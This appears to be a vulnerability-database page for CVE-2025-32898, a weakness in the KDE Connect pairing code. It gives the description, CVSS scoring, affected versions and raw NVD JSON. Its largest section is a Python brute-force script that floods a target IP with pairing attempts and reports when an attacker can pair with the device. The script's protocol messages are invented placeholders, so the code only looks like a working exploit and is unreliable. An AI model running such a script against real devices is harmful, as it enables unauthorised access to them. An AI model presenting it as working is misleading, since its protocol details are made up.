Security Vulnerability Report
中文
CVE-2025-32898 CVSS 4.7 MEDIUM

CVE-2025-32898

Published: 2025-12-05 05:16:58
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The KDE Connect verification-code protocol before 2025-04-18 uses only 8 characters and therefore allows brute-force attacks. This affects KDE Connect before 1.33.0 on Android, KDE Connect before 25.04 on desktop, KDE Connect before 0.5 on iOS, Valent before 1.0.0.alpha.47, and GSConnect before 59.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KDE Connect Android < 1.33.0
KDE Connect Desktop < 25.04
KDE Connect iOS < 0.5
Valent < 1.0.0.alpha.47
GSConnect < 59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-32898 - KDE Connect Verification Code Brute Force PoC Note: This PoC is for educational and security research purposes only. """ import socket import itertools import string import time from concurrent.futures import ThreadPoolExecutor, as_completed # KDE Connect uses port 1716 for discovery and port 1717 for communication KDE_CONNECT_PORT = 1716 BROADCAST_ADDR = "<broadcast>" def generate_candidate_codes(charset=string.digits + string.ascii_lowercase, length=8): """Generate candidate verification codes""" for combo in itertools.product(charset, repeat=length): yield ''.join(combo) def send_kde_connect_pairing_request(target_ip, verification_code): """ Send KDE Connect pairing request with verification code This simulates the protocol interaction for brute force attack """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(2) # KDE Connect protocol packet structure # In real attack, this would be the actual protocol message packet = f"PAIR_REQUEST:{verification_code}".encode() sock.sendto(packet, (target_ip, KDE_CONNECT_PORT)) response, addr = sock.recvfrom(1024) # Check if pairing was successful if b"PAIR_SUCCESS" in response: return True, verification_code return False, None except socket.timeout: return False, None except Exception as e: print(f"Error: {e}") return False, None finally: sock.close() def brute_force_attack(target_ip, max_attempts=1000000, workers=100): """ Perform brute force attack on KDE Connect verification code Args: target_ip: Target device IP address max_attempts: Maximum number of attempts before giving up workers: Number of parallel workers """ print(f"[*] Starting brute force attack on {target_ip}") print(f"[*] Target: KDE Connect verification code") print(f"[*] Using {workers} parallel workers") charset = string.digits + string.ascii_lowercase # Simplified charset attempts = 0 start_time = time.time() with ThreadPoolExecutor(max_workers=workers) as executor: futures = {} for code in generate_candidate_codes(charset, 8): if attempts >= max_attempts: break future = executor.submit(send_kde_connect_pairing_request, target_ip, code) futures[future] = code attempts += 1 # Submit in batches to manage memory if len(futures) >= workers * 2: for completed in as_completed(futures, timeout=0.1): success, result = completed.result() if success: print(f"\n[!] VALID VERIFICATION CODE FOUND: {result}") print(f"[!] Time taken: {time.time() - start_time:.2f} seconds") print(f"[!] Attempts: {attempts}") executor.shutdown(wait=False) return result futures = {} # Check remaining futures for completed in as_completed(futures): success, result = completed.result() if success: print(f"\n[!] VALID VERIFICATION CODE FOUND: {result}") return result print(f"[-] Brute force failed after {attempts} attempts") print(f"[-] Time elapsed: {time.time() - start_time:.2f} seconds") return None if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-32898-poc.py <target_ip> [max_attempts] [workers]") print("Example: python cve-2025-32898-poc.py 192.168.1.100 1000000 100") sys.exit(1) target = sys.argv[1] max_att = int(sys.argv[2]) if len(sys.argv) > 2 else 1000000 workers = int(sys.argv[3]) if len(sys.argv) > 3 else 100 print("=" * 60) print("CVE-2025-32898 - KDE Connect Verification Code Brute Force") print("=" * 60) result = brute_force_attack(target, max_att, workers) if result: print(f"\n[+] Attack successful!") print(f"[+] Verification code: {result}") print(f"[+] Attacker can now pair with target device") else: print(f"\n[-] Attack unsuccessful")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32898", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:16:58.480", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KDE Connect verification-code protocol before 2025-04-18 uses only 8 characters and therefore allows brute-force attacks. This affects KDE Connect before 1.33.0 on Android, KDE Connect before 25.04 on desktop, KDE Connect before 0.5 on iOS, Valent before 1.0.0.alpha.47, and GSConnect before 59."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-331"}]}], "references": [{"url": "https://kde.org/info/security/advisory-20250418-3.txt", "source": "[email protected]"}, {"url": "https://kdeconnect.kde.org", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.